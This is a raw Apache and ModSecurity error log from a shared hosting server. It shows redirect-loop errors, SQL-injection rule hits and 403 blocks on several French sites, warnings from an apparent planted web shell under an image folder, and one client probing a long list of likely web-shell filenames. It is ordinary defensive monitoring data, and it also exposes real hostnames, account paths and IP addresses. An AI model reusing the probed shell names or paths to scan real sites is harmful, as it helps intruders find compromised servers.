[Mon May 11 23:11:16.287838 2026] [core:error] [pid 1630927:tid 1630939] [client 185.213.175.72:35134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.288035 2026] [core:error] [pid 1630927:tid 1630942] [client 185.213.175.72:34896] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.288050 2026] [core:error] [pid 1630927:tid 1630942] [client 185.213.175.72:34896] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.288299 2026] [core:error] [pid 1606352:tid 1606438] [client 185.213.175.72:35010] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.288317 2026] [core:error] [pid 1606352:tid 1606438] [client 185.213.175.72:35010] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.288791 2026] [core:error] [pid 1630927:tid 1630936] [client 185.213.175.72:34934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.288803 2026] [core:error] [pid 1630927:tid 1630936] [client 185.213.175.72:34934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.291149 2026] [core:error] [pid 1606352:tid 1606437] [client 185.213.175.72:34948] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.291183 2026] [core:error] [pid 1606352:tid 1606437] [client 185.213.175.72:34948] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.295507 2026] [core:error] [pid 1606352:tid 1606431] [client 185.213.175.72:35106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:16.295526 2026] [core:error] [pid 1606352:tid 1606431] [client 185.213.175.72:35106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:19.590049 2026] [security2:error] [pid 1590352:tid 1590395] [client 43.130.78.203:38934] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/envie-de-savoir/"] [unique_id "agJF961q0G_aXAqWauQI3AAAAIM"]
[Mon May 11 23:11:47.446662 2026] [security2:error] [pid 1601130:tid 1601164] [client 43.166.136.202:56362] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/downloads/APOE-Convocation_AG-2021.pdf"] [unique_id "agJGE3EgAO_835W6c1mkiQAAAE4"]
[Mon May 11 23:12:13.301480 2026] [security2:error] [pid 1630927:tid 1630931] [client 45.94.31.112:55295] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: add2071f1894a0d9f03410592f9d11a4||1778535730||1778535370"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/xmlrpc.php"] [unique_id "agJGLWiGYYhUwDaJINmbiwAAAUE"]
[Mon May 11 23:12:13.303019 2026] [security2:error] [pid 1630927:tid 1630931] [client 45.94.31.112:55295] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/xmlrpc.php"] [unique_id "agJGLWiGYYhUwDaJINmbiwAAAUE"]
[Mon May 11 23:12:14.031494 2026] [security2:error] [pid 1630927:tid 1630931] [client 45.94.31.112:55295] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJGLWiGYYhUwDaJINmbiwAAAUE"]
[Mon May 11 23:12:15.154101 2026] [security2:error] [pid 1630927:tid 1630931] [client 45.94.31.112:55295] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: add2071f1894a0d9f03410592f9d11a4||1778535730||1778535370"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agJGL2iGYYhUwDaJINmbjQAAAUE"]
[Mon May 11 23:12:15.154326 2026] [security2:error] [pid 1630927:tid 1630931] [client 45.94.31.112:55295] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agJGL2iGYYhUwDaJINmbjQAAAUE"]
[Mon May 11 23:12:15.843709 2026] [security2:error] [pid 1630927:tid 1630931] [client 45.94.31.112:55295] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJGL2iGYYhUwDaJINmbjQAAAUE"]
[Mon May 11 23:12:24.748545 2026] [security2:error] [pid 1605480:tid 1605543] [client 114.119.141.34:54145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: eaab79b10f9bb4c15bb6cc7f8e95bb76||1778535741||1778535381"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2017/06/Depositphotos_25644061_original.jpg"] [unique_id "agJGOB2Cvzd_nyNfUm8NwwAAARU"], referer: https://rentparadise.fr/category/tours
[Mon May 11 23:12:24.748765 2026] [security2:error] [pid 1605480:tid 1605543] [client 114.119.141.34:54145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2017/06/Depositphotos_25644061_original.jpg"] [unique_id "agJGOB2Cvzd_nyNfUm8NwwAAARU"], referer: https://rentparadise.fr/category/tours
[Mon May 11 23:12:25.094788 2026] [security2:error] [pid 1630927:tid 1630947] [client 45.94.31.112:58488] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: add2071f1894a0d9f03410592f9d11a4||1778535730||1778535370"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agJGOWiGYYhUwDaJINmblQAAAVE"]
[Mon May 11 23:12:25.095176 2026] [security2:error] [pid 1630927:tid 1630947] [client 45.94.31.112:58488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agJGOWiGYYhUwDaJINmblQAAAVE"]
[Mon May 11 23:12:25.975047 2026] [security2:error] [pid 1605480:tid 1605543] [client 114.119.141.34:54145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJGOB2Cvzd_nyNfUm8NwwAAARU"], referer: https://rentparadise.fr/category/tours
[Mon May 11 23:12:26.125434 2026] [security2:error] [pid 1630927:tid 1630947] [client 45.94.31.112:58488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJGOWiGYYhUwDaJINmblQAAAVE"]
[Mon May 11 23:12:26.714865 2026] [security2:error] [pid 1630927:tid 1630947] [client 45.94.31.112:58488] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: add2071f1894a0d9f03410592f9d11a4||1778535730||1778535370"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agJGOmiGYYhUwDaJINmbmQAAAVE"]
[Mon May 11 23:12:26.715125 2026] [security2:error] [pid 1630927:tid 1630947] [client 45.94.31.112:58488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agJGOmiGYYhUwDaJINmbmQAAAVE"]
[Mon May 11 23:12:28.779186 2026] [security2:error] [pid 1630927:tid 1630947] [client 45.94.31.112:58488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJGOmiGYYhUwDaJINmbmQAAAVE"]
[Mon May 11 23:12:29.229142 2026] [security2:error] [pid 1630927:tid 1630947] [client 45.94.31.112:58488] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: add2071f1894a0d9f03410592f9d11a4||1778535730||1778535370"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/users/"] [unique_id "agJGPWiGYYhUwDaJINmbogAAAVE"]
[Mon May 11 23:12:29.229372 2026] [security2:error] [pid 1630927:tid 1630947] [client 45.94.31.112:58488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/users/"] [unique_id "agJGPWiGYYhUwDaJINmbogAAAVE"]
[Mon May 11 23:12:29.662672 2026] [security2:error] [pid 1630927:tid 1630947] [client 45.94.31.112:58488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJGPWiGYYhUwDaJINmbogAAAVE"]
[Mon May 11 23:12:38.173868 2026] [security2:error] [pid 1601130:tid 1601160] [client 45.94.31.112:60675] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: add2071f1894a0d9f03410592f9d11a4||1778535730||1778535370"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJGRnEgAO_835W6c1mkwQAAAEo"]
[Mon May 11 23:12:38.174672 2026] [security2:error] [pid 1601130:tid 1601160] [client 45.94.31.112:60675] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJGRnEgAO_835W6c1mkwQAAAEo"]
[Mon May 11 23:12:39.008652 2026] [security2:error] [pid 1601130:tid 1601160] [client 45.94.31.112:60675] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJGRnEgAO_835W6c1mkwQAAAEo"]
[Mon May 11 23:12:42.366978 2026] [security2:error] [pid 1601130:tid 1601154] [client 45.94.31.112:51953] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: add2071f1894a0d9f03410592f9d11a4||1778535730||1778535370"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/xmlrpc.php"] [unique_id "agJGSnEgAO_835W6c1mkxAAAAEQ"]
[Mon May 11 23:12:42.368486 2026] [security2:error] [pid 1601130:tid 1601154] [client 45.94.31.112:51953] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/xmlrpc.php"] [unique_id "agJGSnEgAO_835W6c1mkxAAAAEQ"]
[Mon May 11 23:12:43.050977 2026] [security2:error] [pid 1601130:tid 1601154] [client 45.94.31.112:51953] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJGSnEgAO_835W6c1mkxAAAAEQ"]
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790182/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790182/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790182/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790182/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790182/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790182/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705038/task/1705038/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705038/task/1705038/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705038/task/1705038/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705038/task/1705038/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705038/task/1705038/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705038/task/1705038/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 23:13:48.307433 2026] [authz_core:error] [pid 1606352:tid 1606419] [client 52.172.142.96:2527] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/sitemaps/providers/error_log
[Mon May 11 23:13:52.339406 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/file60.php
[Mon May 11 23:13:52.595942 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/wp-k7djufwez2.php
[Mon May 11 23:13:52.839238 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/bc.php
[Mon May 11 23:13:53.087638 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/100.php
[Mon May 11 23:13:53.351557 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/xmu.php
[Mon May 11 23:13:53.725988 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/bob.php
[Mon May 11 23:13:54.062958 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/av.php
[Mon May 11 23:13:54.688455 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/casp1.php
[Mon May 11 23:13:55.071481 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/file6.php
[Mon May 11 23:13:55.097167 2026] [authz_core:error] [pid 1606352:tid 1606419] [client 52.172.142.96:2527] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-content/uploads/wpcf7_uploads/
[Mon May 11 23:13:55.320669 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/xs.php
[Mon May 11 23:13:55.801414 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/xxa.php
[Mon May 11 23:13:56.052888 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/3369.php
[Mon May 11 23:13:56.473290 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/dostshell.php
[Mon May 11 23:13:57.334580 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/zoper1.php
[Mon May 11 23:13:57.685175 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/77.php
[Mon May 11 23:13:57.929963 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/wp-kz.php
[Mon May 11 23:13:58.204370 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/file6.php
[Mon May 11 23:13:58.468677 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/zogy1.php
[Mon May 11 23:13:58.712080 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/19.php
[Mon May 11 23:13:59.110936 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/11.php
[Mon May 11 23:13:59.524702 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/w.php
[Mon May 11 23:14:00.115708 2026] [authz_core:error] [pid 1606352:tid 1606419] [client 52.172.142.96:2527] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/widgets/error_log
[Mon May 11 23:14:00.236336 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/7.php
[Mon May 11 23:14:00.677805 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/ortasekerli1.php
[Mon May 11 23:14:00.959838 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/xxx.php
[Mon May 11 23:14:01.221863 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/cdxadmin.php
[Mon May 11 23:14:01.713754 2026] [:error] [pid 1588898:tid 1588920] [client 172.212.136.43:12843] File does not exist: /home/piregwan/public_html/gecko.php
